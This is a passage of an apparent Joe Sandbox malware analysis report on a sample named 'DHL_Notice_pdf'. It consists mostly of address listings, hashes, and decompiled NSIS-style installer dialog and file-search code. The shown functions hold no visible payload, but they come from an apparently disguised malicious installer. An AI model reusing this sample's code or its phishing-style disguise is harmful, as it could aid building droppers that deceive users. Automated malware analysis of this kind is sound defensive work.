                                                            0x00406c8b
                                                            0x00406c8c
                                                            0x00406c8c
                                                            0x00000000
                                                            0x00406c88
                                                            0x00406c62
                                                            0x00406c67
                                                            0x00406c67
                                                            0x00406c70
                                                            0x00406c78
                                                            0x00406c7b
                                                            0x00000000
                                                            0x00406c81
                                                            0x00406c81
                                                            0x00000000
                                                            0x00406c81
                                                            0x00000000
                                                            0x00406c9e
                                                            0x00406c9e
                                                            0x00406ca2
                                                            0x0040754e
                                                            0x00000000
                                                            0x0040754e
                                                            0x00406cab
                                                            0x00406cbb
                                                            0x00406cbe
                                                            0x00406cc1
                                                            0x00406cc1
                                                            0x00406cc1
                                                            0x00406cc4
                                                            0x00406cc8
                                                            0x00000000
                                                            0x00000000
                                                            0x00406cca
                                                            0x00406cd0
                                                            0x00406cfa
                                                            0x00406d00
                                                            0x00406d07
                                                            0x00000000
                                                            0x00406d07
                                                            0x00406cd6
                                                            0x00406cd9
                                                            0x00406cde
                                                            0x00406cde
                                                            0x00406ce9
                                                            0x00406cf1
                                                            0x00406cf4
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406d39
                                                            0x00406d3f
                                                            0x00406d42
                                                            0x00406d4f
                                                            0x00406d57
                                                            0x00000000
                                                            0x00000000
                                                            0x00406d0e
                                                            0x00406d0e
                                                            0x00406d12
                                                            0x0040755d
                                                            0x00000000
                                                            0x0040755d
                                                            0x00406d1e
                                                            0x00406d29
                                                            0x00406d29
                                                            0x00406d29
                                                            0x00406d2c
                                                            0x00406d2f
                                                            0x00406d32
                                                            0x00406d37
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406ffe
                                                            0x00407002
                                                            0x00407020
                                                            0x00407023
                                                            0x0040702a
                                                            0x0040702d
                                                            0x00407030
                                                            0x00407033
                                                            0x00407036
                                                            0x00407039
                                                            0x0040703b
                                                            0x00407042
                                                            0x00407043
                                                            0x00407045
                                                            0x00407048
                                                            0x0040704b
                                                            0x0040704e
                                                            0x0040704e
                                                            0x00407053
                                                            0x00000000
                                                            0x00407053
                                                            0x00407004
                                                            0x00407007
                                                            0x0040700a
                                                            0x00407014
                                                            0x00000000
                                                            0x00000000
                                                            0x00407068
                                                            0x0040706c
                                                            0x0040708f
                                                            0x00407092
                                                            0x00407095
                                                            0x0040709f
                                                            0x0040706e
                                                            0x0040706e
                                                            0x00407071
                                                            0x00407074
                                                            0x00407077
                                                            0x00407084
                                                            0x00407087
                                                            0x00407087
                                                            0x00000000
                                                            0x00000000
                                                            0x004070ab
                                                            0x004070af
                                                            0x00000000
                                                            0x00000000
                                                            0x004070b5
                                                            0x004070b9
                                                            0x00000000
                                                            0x00000000
                                                            0x004070bf
                                                            0x004070c1
                                                            0x004070c5
                                                            0x004070c5
                                                            0x004070c8
                                                            0x004070cc
                                                            0x00000000
                                                            0x00000000
                                                            0x0040711c
                                                            0x00407120
                                                            0x00407127
                                                            0x0040712a
                                                            0x0040712d
                                                            0x00407137
                                                            0x00000000
                                                            0x00407137
                                                            0x00407122
                                                            0x00000000
                                                            0x00000000
                                                            0x00407143
                                                            0x00407147
                                                            0x0040714e
                                                            0x00407151
                                                            0x00407154
                                                            0x00407149
                                                            0x00407149
                                                            0x00407149
                                                            0x00407157
                                                            0x0040715a
                                                            0x0040715d
                                                            0x0040715d
                                                            0x00407160
                                                            0x00407163
                                                            0x00407166
                                                            0x00407166
                                                            0x00407169
                                                            0x00407170
                                                            0x00407175
                                                            0x00000000
                                                            0x00000000
                                                            0x00407203
                                                            0x00407203
                                                            0x00407207
                                                            0x004075a5
                                                            0x00000000
                                                            0x004075a5
                                                            0x0040720d
                                                            0x00407210
                                                            0x00407213
                                                            0x00407217
                                                            0x0040721a
                                                            0x00407220
                                                            0x00407222
                                                            0x00407222
                                                            0x00407222
                                                            0x00407225
                                                            0x00407228
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00407286
                                                            0x00407286
                                                            0x0040728a
                                                            0x004075b1
                                                            0x00000000
                                                            0x004075b1
                                                            0x00407290
                                                            0x00407293
                                                            0x00407296
                                                            0x0040729a
                                                            0x0040729d
                                                            0x004072a3
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407056
                                                            0x00407056
                                                            0x00407059
                                                            0x00000000
                                                            0x00000000
                                                            0x00407395
                                                            0x00407399
                                                            0x004073bb
                                                            0x004073be
                                                            0x004073c8
                                                            0x00000000
                                                            0x004073c8
                                                            0x0040739b
                                                            0x0040739e
                                                            0x004073a2
                                                            0x004073a5
                                                            0x004073a5
                                                            0x004073a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407452
                                                            0x00407456
                                                            0x00407474
                                                            0x00407474
                                                            0x00407474
                                                            0x0040747b
                                                            0x00407482
                                                            0x00407489
                                                            0x00407489
                                                            0x00000000
                                                            0x00407489
                                                            0x00407458
                                                            0x0040745b
                                                            0x0040745e
                                                            0x00407461
                                                            0x00407468
                                                            0x004073ac
                                                            0x004073ac
                                                            0x004073af
                                                            0x00000000
                                                            0x00000000
                                                            0x00407543
                                                            0x00407546
                                                            0x00000000
                                                            0x00000000
                                                            0x0040717d
                                                            0x0040717f
                                                            0x00407186
                                                            0x00407187
                                                            0x00407189
                                                            0x0040718c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407194
                                                            0x00407197
                                                            0x0040719a
                                                            0x0040719c
                                                            0x0040719e
                                                            0x0040719e
                                                            0x0040719f
                                                            0x004071a2
                                                            0x004071a9
                                                            0x004071ac
                                                            0x004071ba
                                                            0x00000000
                                                            0x00000000
                                                            0x00407490
                                                            0x00407490
                                                            0x00407493
                                                            0x0040749a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040749f
                                                            0x0040749f
                                                            0x004074a3
                                                            0x004075db
                                                            0x00000000
                                                            0x004075db
                                                            0x004074a9
                                                            0x004074ac
                                                            0x004074af
                                                            0x004074b3
                                                            0x004074b6
                                                            0x004074bc
                                                            0x004074be
                                                            0x004074be
                                                            0x004074be
                                                            0x004074c1
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c7
                                                            0x004074c7
                                                            0x004074cb
                                                            0x0040752b
                                                            0x0040752e
                                                            0x00407533
                                                            0x00407534
                                                            0x00407536
                                                            0x00407538
                                                            0x0040753b
                                                            0x00000000
                                                            0x0040753b
                                                            0x004074cd
                                                            0x004074d3
                                                            0x004074d6
                                                            0x004074d9
                                                            0x004074dc
                                                            0x004074df
                                                            0x004074e2
                                                            0x004074e5
                                                            0x004074e8
                                                            0x004074eb
                                                            0x004074ee
                                                            0x00407507
                                                            0x0040750a
                                                            0x0040750d
                                                            0x00407510
                                                            0x00407514
                                                            0x00407516
                                                            0x00407516
                                                            0x00407517
                                                            0x0040751a
                                                            0x004074f0
                                                            0x004074f0
                                                            0x004074f8
                                                            0x004074fd
                                                            0x004074ff
                                                            0x00407502
                                                            0x00407502
                                                            0x0040751d
                                                            0x00407524
                                                            0x00000000
                                                            0x00407526
                                                            0x00000000
                                                            0x00407526
                                                            0x00000000
                                                            0x004071c2
                                                            0x004071c5
                                                            0x004071fb
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732e
                                                            0x0040732e
                                                            0x00407331
                                                            0x00407333
                                                            0x004075bd
                                                            0x00000000
                                                            0x004075bd
                                                            0x00407339
                                                            0x0040733c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407342
                                                            0x00407346
                                                            0x00407349
                                                            0x00407349
                                                            0x00407349
                                                            0x00000000
                                                            0x00407349
                                                            0x004071c7
                                                            0x004071c9
                                                            0x004071cb
                                                            0x004071cd
                                                            0x004071d0
                                                            0x004071d1
                                                            0x004071d3
                                                            0x004071d5
                                                            0x004071d8
                                                            0x004071db
                                                            0x004071f1
                                                            0x004071f6
                                                            0x0040722e
                                                            0x0040722e
                                                            0x00407232
                                                            0x0040725e
                                                            0x00407260
                                                            0x00407267
                                                            0x0040726a
                                                            0x0040726d
                                                            0x0040726d
                                                            0x00407272
                                                            0x00407272
                                                            0x00407274
                                                            0x00407277
                                                            0x0040727e
                                                            0x00407281
                                                            0x004072ae
                                                            0x004072ae
                                                            0x004072b1
                                                            0x004072b4
                                                            0x00407328
                                                            0x00407328
                                                            0x00407328
                                                            0x00000000
                                                            0x00407328
                                                            0x004072b6
                                                            0x004072bc
                                                            0x004072bf
                                                            0x004072c2
                                                            0x004072c5
                                                            0x004072c8
                                                            0x004072cb
                                                            0x004072ce
                                                            0x004072d1
                                                            0x004072d4
                                                            0x004072d7
                                                            0x004072f0
                                                            0x004072f2
                                                            0x004072f5
                                                            0x004072f6
                                                            0x004072f9
                                                            0x004072fb
                                                            0x004072fe
                                                            0x00407300
                                                            0x00407302
                                                            0x00407305
                                                            0x00407307
                                                            0x0040730a
                                                            0x0040730e
                                                            0x00407310
                                                            0x00407310
                                                            0x00407311
                                                            0x00407314
                                                            0x00407317
                                                            0x004072d9
                                                            0x004072d9
                                                            0x004072e1
                                                            0x004072e6
                                                            0x004072e8
                                                            0x004072eb
                                                            0x004072eb
                                                            0x0040731a
                                                            0x00407321
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x00000000
                                                            0x00407323
                                                            0x00000000
                                                            0x00407323
                                                            0x00407321
                                                            0x00407234
                                                            0x00407237
                                                            0x00407239
                                                            0x0040723c
                                                            0x0040723f
                                                            0x00407242
                                                            0x00407244
                                                            0x00407247
                                                            0x0040724a
                                                            0x0040724a
                                                            0x0040724d
                                                            0x0040724d
                                                            0x00407250
                                                            0x00407257
                                                            0x0040722b
                                                            0x0040722b
                                                            0x0040722b
                                                            0x0040722b
                                                            0x00000000
                                                            0x00407259
                                                            0x00000000
                                                            0x00407259
                                                            0x00407257
                                                            0x004071dd
                                                            0x004071e0
                                                            0x004071e2
                                                            0x004071e5
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004070cf
                                                            0x004070cf
                                                            0x004070d3
                                                            0x00407599
                                                            0x00000000
                                                            0x00407599
                                                            0x004070d9
                                                            0x004070dc
                                                            0x004070df
                                                            0x004070e2
                                                            0x004070e4
                                                            0x004070e4
                                                            0x004070e4
                                                            0x004070e7
                                                            0x004070ea
                                                            0x004070ed
                                                            0x004070f0
                                                            0x004070f3
                                                            0x004070f6
                                                            0x004070f7
                                                            0x004070f9
                                                            0x004070f9
                                                            0x004070f9
                                                            0x004070fc
                                                            0x004070ff
                                                            0x00407102
                                                            0x00407105
                                                            0x00407105
                                                            0x00407105
                                                            0x00407108
                                                            0x00000000
                                                            0x00000000
                                                            0x0040734c
                                                            0x0040734c
                                                            0x0040734c
                                                            0x00407350
                                                            0x00000000
                                                            0x00000000
                                                            0x00407356
                                                            0x00407359
                                                            0x0040735c
                                                            0x0040735f
                                                            0x00407361
                                                            0x00407361
                                                            0x00407361
                                                            0x00407364
                                                            0x00407367
                                                            0x0040736a
                                                            0x0040736d
                                                            0x00407370
                                                            0x00407373
                                                            0x00407374
                                                            0x00407376
                                                            0x00407376
                                                            0x00407376
                                                            0x00407379
                                                            0x0040737c
                                                            0x0040737f
                                                            0x00407382
                                                            0x00407385
                                                            0x00407389
                                                            0x0040738b
                                                            0x0040738e
                                                            0x00000000
                                                            0x00407390
                                                            0x00000000
                                                            0x00407390
                                                            0x0040738e
                                                            0x004075c3
                                                            0x00000000
                                                            0x00000000
                                                            0x00406bf2

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                            • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                            • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                            • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




                                                            0x004069a9
                                                            0x004069b2
                                                            0x00000000
                                                            0x004069bf
                                                            0x004069b5
                                                            0x00000000

                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(74D0FAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560), ref: 004069A9
                                                            • FindClose.KERNEL32(00000000), ref: 004069B5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                            • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                            • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                            • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 167 40428f-404297 146->167 163 4042fb-404316 147->163 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 162 404591 153->162 164 404130-404143 GetWindowLongW 155->164 165 40422b-404239 call 40462b 155->165 158 404171-404174 156->158 159 40415a-40416c DestroyWindow 156->159 169 404176-404182 SetWindowLongW 158->169 170 404187-40418d 158->170 166 40456e-404574 159->166 168 404593-40459a 162->168 173 404318-40431a call 40140b 163->173 174 40431f-404325 163->174 164->165 175 404149-40414c ShowWindow 164->175 165->168 166->162 180 404576-40457c 166->180 167->145 169->168 170->165 176 404193-4041a2 GetDlgItem 170->176 173->174 181 40432b-404336 174->181 182 40454f-404568 DestroyWindow EndDialog 174->182 175->156 184 4041c1-4041c4 176->184 185 4041a4-4041bb SendMessageW IsWindowEnabled 176->185 177->168 180->162 186 40457e-404587 ShowWindow 180->186 181->182 183 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->183 182->166 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 183->213 214 40438b-404390 183->214 188 4041c6-4041c7 184->188 189 4041c9-4041cc 184->189 185->162 185->184 186->162 191 4041f7-4041fc call 40459d 188->191 192 4041da-4041df 189->192 193 4041ce-4041d4 189->193 191->165 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->165 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 209 4041f5 201->209 202->165 211 404209-404213 202->211 209->191 211->209 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->163 233 404464-404466 222->233 233->163 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->162 237 40447e-404484 235->237 236->166 238 4044a9-4044d6 CreateDialogParamW 236->238 237->163 239 40448a 237->239 238->166 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 404535-40454d ShowWindow call 404610 240->245 245->166
                                                            C-Code - Quality: 84%
                                                            			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238); // executed
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						_t145 =  *0x425748 - _t136; // 0x0
						if(_t145 == 0 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}
































                                                            0x004040d0
                                                            0x004040d7
                                                            0x0040423e
                                                            0x00404242
                                                            0x00404246
                                                            0x00404248
                                                            0x0040424d
                                                            0x00404258
                                                            0x00404263
                                                            0x00404268
                                                            0x0040426a
                                                            0x0040426c
                                                            0x0040426f
                                                            0x00404274
                                                            0x00404282
                                                            0x0040428f
                                                            0x00404296
                                                            0x00404296
                                                            0x00404297
                                                            0x00404297
                                                            0x0040429c
                                                            0x004042a2
                                                            0x004042a9
                                                            0x004042af
                                                            0x004042b1
                                                            0x004042f1
                                                            0x004042f6
                                                            0x004042fb
                                                            0x004042fb
                                                            0x00404300
                                                            0x00404309
                                                            0x0040430b
                                                            0x00404310
                                                            0x00404316
                                                            0x0040431a
                                                            0x0040431a
                                                            0x0040431f
                                                            0x00404325
                                                            0x00000000
                                                            0x00000000
                                                            0x00404330
                                                            0x00404336
                                                            0x00000000
                                                            0x00000000
                                                            0x0040433f
                                                            0x00404347
                                                            0x0040434c
                                                            0x0040434f
                                                            0x00404355
                                                            0x0040435a
                                                            0x0040435d
                                                            0x00404363
                                                            0x00404368
                                                            0x0040436b
                                                            0x00404371
                                                            0x00404379
                                                            0x0040437f
                                                            0x00404385
                                                            0x00404389
                                                            0x00404390
                                                            0x00404390
                                                            0x00404390
                                                            0x0040439a
                                                            0x004043ac
                                                            0x004043b8
                                                            0x004043bd
                                                            0x004043c7
                                                            0x004043cd
                                                            0x004043cf
                                                            0x004043d4
                                                            0x004043d1
                                                            0x004043d1
                                                            0x004043d1
                                                            0x004043e4
                                                            0x004043fc
                                                            0x004043fe
                                                            0x00404404
                                                            0x00404419
                                                            0x00404406
                                                            0x0040440f
                                                            0x00404411
                                                            0x00404411
                                                            0x0040441f
                                                            0x00404430
                                                            0x00404446
                                                            0x0040444d
                                                            0x00404453
                                                            0x00404457
                                                            0x0040445c
                                                            0x0040445e
                                                            0x00000000
                                                            0x00404464
                                                            0x00404464
                                                            0x00404466
                                                            0x00000000
                                                            0x00000000
                                                            0x0040446c
                                                            0x00404470
                                                            0x00404495
                                                            0x0040449b
                                                            0x004044a1
                                                            0x004044a3
                                                            0x00000000
                                                            0x00000000
                                                            0x004044c9
                                                            0x004044cf
                                                            0x004044d1
                                                            0x004044d6
                                                            0x00000000
                                                            0x00000000
                                                            0x004044dc
                                                            0x004044df
                                                            0x004044e2
                                                            0x004044f9
                                                            0x00404505
                                                            0x0040451e
                                                            0x00404524
                                                            0x00404528
                                                            0x0040452d
                                                            0x00404533
                                                            0x00000000
                                                            0x00000000
                                                            0x0040453d
                                                            0x00404548
                                                            0x00000000
                                                            0x00404548
                                                            0x00404472
                                                            0x00404478
                                                            0x00000000
                                                            0x00000000
                                                            0x0040447e
